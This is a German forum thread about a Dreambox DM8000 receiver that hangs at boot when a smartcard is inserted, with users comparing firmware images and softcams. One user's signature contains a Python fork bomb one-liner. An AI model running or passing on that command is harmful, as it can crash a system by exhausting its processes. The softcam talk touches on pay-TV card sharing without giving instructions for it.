DM8000 hängt beim Boot wenn eine Smartcard drin ist

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

• DM8000 hängt beim Boot wenn eine Smartcard drin ist

Hallo zusammen,

ich habe jetzt schon eine Menge Zeit investiert um die verschiedenen Fehlermöglichkeiten zu erforschen.
      Leider komme ich nicht weiter.
      Ich habe eine "ältere" und, falls jemand fragt, eine "Originale" DM8000 laut Genuine Test.
      Eingebaut ist ein DVD Brenner.
      Der SSL 83 ist schon drauf wegen der vielen Tests.

Was ist mein Problem:
      Immer wenn ich die Box mit einer Smartcard in einem internen Schacht boote, egal ob Sky oder HD-Plus, bleibt sie beim Booten hängen und ich sehe nur drehende Zahnräder.
      Im OLED geschätzt bei 90%
      Ohne SC bootet die Box normal, leider ist das nicht der Modus in dem ich sie betreiben möchte.

In einer DM800se mit exact gleichem Aufbau bei der SW gibt es keine Probleme !

Mit dem GP 5.1 als Alternative gibt es KEINE Probleme.
      Möchte ich aber nicht mehr verwenden.

Hat jemand noch eine Idee ?

Natürlich habe ich das 3.2.1 Image + Online Update auf 3.2.2 verwendet

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von klausi99 ()

• Standardmässig benutze ich drei Karten.
      Sky in sci0
      HD-Plus in sci1
      Eine viaccess in einem Smargo-USB

Softcam ist OSCAM 1.0 und CCcam 2.2.1

Jedesmal alle Karten zu entfernen um die Box neu zu starten kann ja nicht die Lösung sein. :(

Das Problem tritt schon bei einer einzigen Karte auf, egal ob im sc0 oder sc1, ohne Smargo.
      Keine Karte drin, problemloser Boot

Ich verstehe einfach nicht, das beim GP 5.1 das Problem nicht auftritt.
      Und das die DM800se mit der gleichen Newnigma2 Version auch keinen Stress hat.

Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von klausi99 ()

• Also ich habe in meiner 8k auch Karten und die bootet immer.
      Der smargo kann aber bekanntermaßen Probleme machen, ich könnte fast wettern das die Box ohne smargo richtig bootet.
    • Original von sparksofinsanity
      Also ich habe in meiner 8k auch Karten und die bootet immer.
      Der smargo kann aber bekanntermaßen Probleme machen, ich könnte fast wettern das die Box ohne smargo richtig bootet.

Wie ich schon sagte, ohne Smargo, nur mit einer einzelnen Karte (egal welche) hängt er.
    • ...kenn ich nur zu gut!

...kann ich auch bestätigen und ist total nervig! hatte mal eine zeit lang eine orf ice im ersten schacht mit scam am laufen und jedes verfickte mal ist das teil beim hochfahren hängen geblieben! X( vor allem da dmm dieses prob ja schon etwas länger kennt und sich daran einfach nichts tut... :( mit der cccam müsste es auch so gewesen sein, aber das weiss ich nicht mehr zu 100%. ist ja schließlich auch alles schon eine weile her...

aber falls interesse besteht, kann ich da heute abend auch gerne mal eine bootlog mitlaufen lassen, damit es vielleicht auch irgendwann mal gefixt wird. ist ja schließlich net sinn der sache, immer diese drecks karten ziehen zu müssen... :rolleyes:
    • Na dann wünsche ich viel Glück.

Ich hatte das persönlich noch nie - auf 9 Geräten nicht, auch auf meiner 8k nicht.
      Aber ich kenne die Logs, da spinnen alle Cardreader selbst der von der Security SIM

Der Fehler wurde DMM ja schon des öfteren zugetragen..nur weiß da anscheinend auch niemand woher das kommt.

Aber möglich das es nur alte Boxen betrifft, ab rev1.3 wurde ein Chip in der Box getauscht gegen ein Alcor Micro.

Ich habe hier wie gesagt so eine neue Box und hatte das noch nie.
      bcm4506 Tuner (sieht man im WebInterface bei Extras > Device Informationen) = gleich rev1.3
    • RE: ...kenn ich nur zu gut!

Original von maddnz
      aber falls interesse besteht, kann ich da heute abend auch gerne mal eine bootlog mitlaufen lassen, damit es vielleicht auch irgendwann mal gefixt wird. ist ja schließlich net sinn der sache, immer diese drecks karten ziehen zu müssen...

Schon mal gut das ich nicht der einzige mit dem Problem bin. :)

Wie kann man einen bootlog einstellen ?
      Es wäre schon interessant zu sehen was da geschieht.

Mich macht wahnsinnig das das uralte GP 5.1 da keine Probleme macht.
      Da müssten die Probleme ja von neueren Treibern kommen.

Ich habe jetzt erst mal das neueste PB-VX E2 drauf gemacht.
      Allerdings darf ich im Moment nicht weiter testen.

Meine Frau bringt mich sonst um ;)
    • das ist das Problem was ich damals mit der 800er auch hatte

bei mir lag das problem am Smargo (am 2.smargo) , so lange da keine karte drin war ging alles.

zieh den smargo mal ab und lass 2 karten drin.

was ich auch schon hatte, die box bootet nicht wenn cccam aktiv ist, aber keine inet connection zu den clients da war, dann hat cccam den ganzen bootvorgang der dream blockiert.
      Probleme kann man niemals mit derselben Denkweise lösen.

¯\_(ツ)_/¯

"Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von deepblue2000 ()

• Hallo zusammen,

danke für alle Hinweise.

Ich habe wohl eine alte DM8000
      => BCM4501 Tuner => keine Ahnung welche Revision

Gemini Project 5.1 => alles geht
      Newnigma2 3.2.2 => hängt selbst bei einer internen Smartcard (OHNE) Smargo
      PB-E2 VX 20111010 => alles geht

Damit ist für mich klar das es am Newnigma2 Image liegt und nicht an meiner "alten" Hardware.

Schade, ich finde das Image wirklich gut und verwende es zur Zeit noch auf ein paar DM800/DM800se.
    • Original von sparksofinsanity
      Naja mal ehrlich ich finde du machst es dir sehr einfach.
      Wie kannst du dir denn erklären das dieses Problem nicht bei mir oder anderen tausenden 8k Besitzern auftaucht ?

Das sind vermutlich versteckte Treiber-Bugs und Fertigungstolleranzen die dafür verantwortlich sind.

Was soll ich dazu sagen ?

GP5.1 geht
      Newnigma2 3.2.2 geht NICHT
      PB-E2 VX geht

Ich habe halt eine ältere DM8000 (nicht DM800,DM800se) bei der das "aktuelle 3.2.2" Image für die "DM8000" nicht geht mit Smartcards.
      OHNE läuft es ja.

Das Image ist auch schon älter - natürlich wird es an Treiber Bugs liegen.
      Offenkundig NICHT an meiner Hardware.

Ist das einfach gemacht: JA

Aber was soll ich denn deiner Meinung nach machen ?
    • Du gibst dir die antworten schon selbst ältere hardware läuft auch mit älterem image(GP usw) im NN2 sind halt neuere treiber die mit deiner hardware nicht sauber laufen.
      Diese Proprietären Treiber bauen nicht wir sondern DreamMultimedia wie sollen wir das nun ändern??
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Antwort: eher garnicht. ;)

Klausi kann ja mit dem GP oder dem anderen Image mit den aelteren Treibern gluecklich werden, wenn er das Verhalten nicht bei DMM melden will.

Zumindest kann ich seine Probleme bei meiner "alten" 8000er nicht nachvollziehen. Diese bootet problemlos in allen Lebenslagen, mit saemtlichen Karten drin.
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • @klausi99:

Hast Du mal versucht, alle Softcams zu deinstallieren/deaktivieren und dann zu starten? WIE "alt" ist denn Deine 8000er?

@LoUIs:

WIE "alt" ist denn Deine 8000er? Und welches Softcam verwendest Du? Hast Du nn 3.2.2 drauf? Möchte meine 8000er demnächst auch auf nn 3.3.2 updaten, gefällt mir viel besser als das GP. Habe die 3.2.2 auf meine neue 800se geflasht und bin total zufrieden, vor allem die Bootzeiten sind spürbar kürzer als bei GP 4.5. Meine DM 8000 ist im November 2009 gekauft.
    • In unseren Image gibt es ein ConfigSaver mit dem man die wichtigsten Dinge sichern kann.
      Wenn du ein anderes Image sichern möchtest - komplett mit allem drum herum dann wird sich sicher dflash anbieten.

Ich habe es zwar selber noch nicht genutzt da ich so was lieber auf meine eigene Art mache aber soweit ich gelesen habe soll das wohl funktionieren.
    • Original von Tommy654xx
      @LoUIs:

WIE "alt" ist denn Deine 8000er? Und welches Softcam verwendest Du? Hast Du nn 3.2.2 drauf? Möchte meine 8000er demnächst auch auf nn 3.3.2 updaten, gefällt mir viel besser als das GP. Habe die 3.2.2 auf meine neue 800se geflasht und bin total zufrieden, vor allem die Bootzeiten sind spürbar kürzer als bei GP 4.5. Meine DM 8000 ist im November 2009 gekauft.

Keine Ahnung von wann die genau ist, sie hat auf jeden Fall die alten Tuner.
      Als Cams laeuft aktuell die Kombination aus CCcam und OScam ohne (Boot)Probleme, probiert habe ich es aber auch mit scam und mit einer der letzten Versionen der gbox.net und mit keiner Kombination hatte ich ein (Boot)Problem.
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)